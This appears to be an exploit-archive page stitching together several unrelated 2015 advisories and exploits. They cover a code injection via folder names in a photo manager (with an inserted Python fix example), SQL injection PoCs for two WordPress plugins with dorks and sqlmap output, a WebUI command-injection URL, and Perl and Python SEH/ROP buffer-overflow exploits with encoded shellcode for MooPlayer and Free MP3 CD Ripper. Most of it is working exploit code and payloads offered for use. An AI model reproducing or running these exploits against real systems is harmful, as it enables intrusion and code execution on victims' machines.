<div id="breadcrumb"><span id="breadcrumb_span"><a href="index.html">Home</a><label> > <a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></label></x></a></label></span></div>
<form id="download_form" action="download.action" method="post">
<div id="content"><ul></ul></div>
</form>
</div>

PoC: Vulnerable Source
}
function createFolder() {
    $.ajax({
        type: 'POST',
        url: 'newfolder.action',
        cache: false,
        dataType: 'json',
        data: {folderName:$('#foldername').attr('value'), isSubfolder:$('#is_subfolder_hidden').attr('value'), parentFolderID:$('#parent_folder_hidden').attr('value')},
        async: false,
        success: function(result) {
            window.location.reload(false);
        }
    });
}
</script>

--- Poc Session Logs [POST] (Inject) ---
Status: 200[OK]
POST http://localhost:8080/newfolder.action
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[http://localhost:8080/index.html]
      Content-Length[50]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      folderName[*/-CODE EXECUTION VULNERABILITY!;]
      isSubfolder[0]
      parentFolderID[0]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[23]
      Date[Do., 05 März 2015 20:34:46 GMT]

Status: 200[OK]
GET http://localhost:8080/index.html
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[9421] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8080/browse_folder.html?folderID=6]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[9421]
      Date[Do., 05 März 2015 20:34:46 GMT]

Status: 200[OK]
GET http://localhost:8080/javascript/linkus.js
Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[397] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8080/index.html]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[397]
      Date[Do., 05 März 2015 20:34:46 GMT]

Reference(s):
http://localhost:8080/index.html
http://localhost:8080/newfolder.action
http://localhost:8080/index.html#?w=300
http://localhost:8080/browse_folder.html?folderID=5

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable folderName value.
Restrict the input and filter the context by usage of an own exception to prevent the application-side code execution.

Security Risk:
==============
The security risk of the code execution vulnerability in the photo manager wifi service is estimated as high. (CVSS 8.6)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
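The "Solution - Fix & Patch" section above asks for two things: restrict the folderName input, and encode it for the HTML context it is rendered into (the folder list and the breadcrumb). The following is an added example of both controls, written for this page; it is not code from the advisory or from the Photo Manager Pro application, whose server-side handler for newfolder.action is not shown anywhere above. The allowlist policy, the handle_newfolder stand-in and the exception name are assumptions for the demo; the HTML shape mirrors the folders_ul markup in the PoC.

```python
import html
import re

# Assumed allowlist policy for folder names (letters, digits, space, dash,
# underscore, dot; at most 64 characters). Not the application's own rule.
_FOLDER_NAME_RE = re.compile(r"^[A-Za-z0-9 _.-]{1,64}$")


class InvalidFolderName(ValueError):
    """Raised when a submitted folderName fails the allowlist check."""


def validate_folder_name(name: str) -> str:
    """Input restriction: accept only allowlisted characters and a sane length.

    Returns the stripped name, or raises InvalidFolderName so the caller can
    answer the AJAX request with an error instead of storing the value.
    """
    cleaned = name.strip()
    if not _FOLDER_NAME_RE.fullmatch(cleaned):
        raise InvalidFolderName(f"rejected folderName: {name!r}")
    return cleaned


def render_folder_item(folder_id: int, name: str) -> str:
    """Output encoding: build the <li> the index page renders for one folder.

    The stored name is HTML-escaped with quotes included, so it stays inert
    whether it lands in element text or inside an attribute value. The id is
    coerced to int so it cannot smuggle characters into the href either.
    """
    safe_name = html.escape(name, quote=True)
    href = f"browse_folder.html?folderID={int(folder_id)}"
    return (
        f'<li><div class="folder_item_bg">'
        f'<a href="{href}"><img src="images/blank_thumbnail.png" height="86" width="80"></a>'
        f'</div><div class="folder_label"><a href="{href}">{safe_name}</a></div></li>'
    )


def render_folder_list(folders) -> str:
    """Render the whole folders_ul list, escaping every stored name on output."""
    items = "".join(render_folder_item(fid, name) for fid, name in folders)
    return f'<ul id="folders_ul">{items}</ul>'


def handle_newfolder(folder_name: str, existing: list) -> dict:
    """Constructed stand-in for the newfolder.action handler (assumption).

    Validates before storing and returns a JSON-style dict for the AJAX caller.
    `existing` is the in-memory folder table: a list of (folderID, name).
    """
    try:
        cleaned = validate_folder_name(folder_name)
    except InvalidFolderName as exc:
        return {"ok": False, "error": str(exc)}
    new_id = max((fid for fid, _ in existing), default=0) + 1
    existing.append((new_id, cleaned))
    return {"ok": True, "folderID": new_id}


if __name__ == "__main__":
    folders = [(1, "Family"), (2, "Friends")]
    print(handle_newfolder("Travel", folders))              # stored
    print(handle_newfolder("Funny</a><b>bold</b>", folders))  # rejected at input
    print(render_folder_list(folders))                      # names escaped at output
```

Both layers matter: the allowlist stops markup from ever being stored, and the escape on output protects folders that were created before the fix or through another code path. Validation belongs in the server-side handler, not in the createFolder() JavaScript shown in the PoC, since the POST can be sent without the page.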
HireHackking

WordPress Plugin NEX-Forms < 3.0 - SQL Injection

######################
# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Website Author: http://www.homelab.it
#                 http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
# Dork Google: inurl:nex-forms-express-wp-form-builder
#              index of nex-forms-express-wp-form-builder
# Date : 2015-03-29
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
######################

# Info:

The "submit_nex_form" ajax function is affected by an SQL injection vulnerability: the "nex_forms_Id" var is not sanitized.

# PoC Exploit:

http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)

# Poc Video:

http://youtu.be/04G08Cbrx1I

# PoC sqlmap:

sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql

[23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
---
Parameter: nex_forms_Id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
---
[23:16:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0.12

######################

# Vulnerability Disclosure Timeline:

2015-03-29: Discovered vulnerability
2015-04-16: Vendor Notification
2015-04-17: Vendor Response/Feedback
2015-04-21: Vendor Send Fix/Patch (same version number)
2015-04-21: Public Disclosure

#####################

Discovered By : Claudio Viviani

http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
HireHackking

MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (2)

#!/usr/bin/perl
############################################################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow
# Date: 09-02-2015
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: MooPlayer v1.3.0
# Vendor Homepage: https://mooplayer.jaleco.com/
# Software Link: http://www.exploit-db.com/apps/a2eba48a6789803f2a3aca8c93b86cb7-mooplayer-1.3.0.zip
# Version: 1.3.0
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 118128
############################################################################################################
# Credits:
# Vulnerability identified by Samandeep Singh
# http://www.exploit-db.com/exploits/36022/
############################################################################################################
# Exploit notes:
# mooplayer.exe was not compiled with SafeSEH, but always contains \x00 (bad character)
#   available and could be used, which would make the exploit work across multiple OS
#   versions, but the shellcode space would be limited since \x00 would terminate the string
# other available modules (Win XP SP2 EN) - enough space for larger shellcode
#   oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
#   OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
############################################################################################################
# Bad characters:
# "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"
# "\x0b\x0c"
# "\x0e\x0f"
# "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19"
# "\x1a\x1b\x1c\x1d\x1e\x1f"
############################################################################################################
# How to exploit:
# MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit
#   file) -> Open
# OR drag and drop created exploit file into MooPlayer
############################################################################################################
# Thanks to:
# Samandeep Singh (PoC)
# Peter Van Eeckhoutte (exploit development tutorials)
# Offensive Security (IT security courses, admin support)
############################################################################################################

$file = "MooPlayer_messagebox.m3u";

my $junk = "A" x 264;
my $nextSEH = "\xeb\x20\x90\x90";         # jump over the next 32 bytes
my $SEH = pack('V',0x74c96950);           # POP POP RET from oleacc.dll (Win XP SP2 EN)
my $NOPs = "\x90" x 100;

# msfpayload windows/messagebox
# msfencode -e x86/alpha_upper
my $shellcode =
"\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" .
"\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" .
"\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" .
"\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" .
"\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" .
"\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" .
"\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" .
"\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" .
"\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" .
"\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" .
"\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" .
"\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" .
"\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" .
"\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" .
"\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" .
"\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" .
"\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" .
"\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" .
"\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" .
"\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" .
"\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" .
"\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" .
"\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" .
"\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" .
"\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" .
"\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" .
"\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" .
"\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" .
"\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" .
"\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" .
"\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" .
"\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" .
"\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" .
"\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" .
"\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" .
"\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" .
"\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" .
"\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" .
"\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" .
"\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" .
"\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" .
"\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" .
"\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" .
"\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" .
"\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" .
"\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" .
"\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" .
"\x4f\x50\x55\x45\x58\x41\x41";

# keep the exploit length consistent
my $endjunk = "\x90" x (10000 - length($junk.$nextSEH.$SEH.$NOPs.$shellcode));

open(myfile,">$file");
print myfile $junk.$nextSEH.$SEH.$NOPs.$shellcode.$endjunk;
close(myfile);
HireHackking

WebUI 1.5b6 - Remote Code Execution

#[+] Author: TUNISIAN CYBER
#[+] Title: WebUI Remote Code Execution Vulnerability
#[+] Date: 21-04-2015
#[+] Vendor: https://github.com/baram01/webui/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Proof of concept: http://i.imgur.com/co9Qx0n.png
-------------------------------------------------------------------------------

p0c:
http://site/webui/mainfile.php?username=USER&password=PASSWORD&_login=1&Logon=';echo system('command');'

Live HTTP Header:
http://192.168.186.129/webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27

GET /webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27 HTTP/1.1
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 200 OK
Date: Wed, 22 Apr 2015 13:20:23 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 51
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
HireHackking

WordPress Plugin Ultimate Product Catalogue - SQL Injection (2)

# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps

1. Summary:

Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +59.000 downloads, +3.000 active installations.
Unauthenticated SQL injection in parameter "SingleProduct" when a web visitor explores a product published by the web administrator.

2. Vulnerability timeline:

- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3

3. Vulnerable code:

File Functions/Shortcodes.php line 779

4. Proof of concept:

http://<wordpress site>/?SingleProduct=2'+and+'a'='a
http://<wordpress site>/?SingleProduct=2'+and+'a'='b

5. Solution:

Update to version 3.1.3
HireHackking

Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)

#!/usr/bin/env perl
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# however he was attempting a vanilla buffer overflow
# in fact it is an SEH based exploit
# using the address 0x7C9D30D7 limits the targets
# which I assume belongs to an OS file; didn't work on win7
# yes he did find a buffer overflow since the offset reaches ESP before SEH
# in this app, SEH based exploits are more effective and the main vuln in this case should be SEH
# This p0c > win 7s & 8s
# ThreatActor at CoreRed.com
##

my $file = "p0c.wav";

my $buff = "A" x 4116;                   # offset to SEH
my $nseh = "\xeb\x06\xff\xff";           # dat 8 jmp
my $seh = pack('V', 0x66E42A79);         # 66E42A79 5E POP ESI ogg.dll
my $nop = "\x90" x 28;

# msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
my $shell =
"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" .
"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" .
"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" .
"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" .
"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" .
"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" .
"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" .
"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" .
"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" .
"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" .
"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" .
"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" .
"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" .
"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" .
"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" .
"\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5";

open($FILE,">$file");
print $FILE $buff.$nseh.$seh.$nop.$shell;
close($FILE);
print "+++++++++++++++++++\n";
HireHackking
#!/usr/bin/python
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# modified SEH Exploit https://www.exploit-db.com/exploits/36826/
# credit to ThreatActor at CoreRed.com
# Software Link: https://www.exploit-db.com/apps/64215b82be8bb2e749f95fec5b51d3e4-FMCRSetup.exe
# Tested on: Windows 7 Ultimate X64
# Added DEP Bypass to the exploit
# naxxo (head@gmail.com)
# (Python 2 script: str is a byte string, so ''.join() over struct.pack() works)

import struct


def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x004103fe,  # POP EAX # RETN [fcrip.exe]
        0x004e91f4,  # ptr to &VirtualAlloc() [IAT fcrip.exe]
        0x00418ff8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe]
        0x00446c97,  # PUSH EAX # POP ESI # POP EBX # RETN [fcrip.exe]
        0x41414141,  # Filler (compensate)
        0x6f4811f8,  # POP EBP # RETN [vorbisfile.dll]
        0x1000c5ce,  # & push esp # ret [libFLAC.dll]
        0x00415bfb,  # POP EBX # RETN [fcrip.exe]
        0x00000001,  # 0x00000001-> ebx
        0x00415828,  # POP EDX # RETN [fcrip.exe]
        0x00001000,  # 0x00001000-> edx
        0x10005f62,  # POP ECX # RETN [libFLAC.dll]
        0x00000040,  # 0x00000040-> ecx
        0x00409967,  # POP EDI # RETN [fcrip.exe]
        0x00412427,  # RETN (ROP NOP) [fcrip.exe]
        0x00494277,  # POP EAX # RETN [fcrip.exe]
        0x90909090,  # nop
        0x004c8dc0,  # PUSHAD # RETN [fcrip.exe]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)


rop_chain = create_rop_chain()

# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\xff\x0a\x0d'
shellcode = ""
shellcode += "\xbf\xaa\x7e\xf4\xa0\xd9\xec\xd9\x74\x24\xf4\x5a\x33"
shellcode += "\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x0f\x03\x7a\xa5\x9c"
shellcode += "\x01\x5c\x51\xe2\xea\x9d\xa1\x83\x63\x78\x90\x83\x10"
shellcode += "\x08\x82\x33\x52\x5c\x2e\xbf\x36\x75\xa5\xcd\x9e\x7a"
shellcode += "\x0e\x7b\xf9\xb5\x8f\xd0\x39\xd7\x13\x2b\x6e\x37\x2a"
shellcode += "\xe4\x63\x36\x6b\x19\x89\x6a\x24\x55\x3c\x9b\x41\x23"
shellcode += "\xfd\x10\x19\xa5\x85\xc5\xe9\xc4\xa4\x5b\x62\x9f\x66"
shellcode += "\x5d\xa7\xab\x2e\x45\xa4\x96\xf9\xfe\x1e\x6c\xf8\xd6"
shellcode += "\x6f\x8d\x57\x17\x40\x7c\xa9\x5f\x66\x9f\xdc\xa9\x95"
shellcode += "\x22\xe7\x6d\xe4\xf8\x62\x76\x4e\x8a\xd5\x52\x6f\x5f"
shellcode += "\x83\x11\x63\x14\xc7\x7e\x67\xab\x04\xf5\x93\x20\xab"
shellcode += "\xda\x12\x72\x88\xfe\x7f\x20\xb1\xa7\x25\x87\xce\xb8"
shellcode += "\x86\x78\x6b\xb2\x2a\x6c\x06\x99\x20\x73\x94\xa7\x06"
shellcode += "\x73\xa6\xa7\x36\x1c\x97\x2c\xd9\x5b\x28\xe7\x9e\x94"
shellcode += "\x62\xaa\xb6\x3c\x2b\x3e\x8b\x20\xcc\x94\xcf\x5c\x4f"
shellcode += "\x1d\xaf\x9a\x4f\x54\xaa\xe7\xd7\x84\xc6\x78\xb2\xaa"
shellcode += "\x75\x78\x97\xc8\x18\xea\x7b\x21\xbf\x8a\x1e\x3d"

junk = "A" * 3812
junk += rop_chain + "\x90" * (308 - len(rop_chain) - len(shellcode)) + shellcode

# 0x639d2ad8 : {pivot 1132 / 0x46c} : # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [vorbis.dll] ** | {PAGE_EXECUTE_READ}
seh = "\xd8\x2a\x9d\x63"

buffer = junk + seh + "\x90" * 800

file = "poc.wav"
f = open(file, "w")
f.write(buffer)
f.close()
HireHackking

R2/Extreme 1.65 - Stack Buffer Overflow / Directory Traversal

source: https://www.securityfocus.com/bid/52061/info

R2/Extreme is prone to a stack-based buffer-overflow vulnerability and a directory-traversal vulnerability.

Exploiting these issues may allow remote attackers to execute arbitrary code or retrieve arbitrary files within the context of the affected application.

R2/Extreme 1.65 is vulnerable; other versions may also be affected.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36829.zip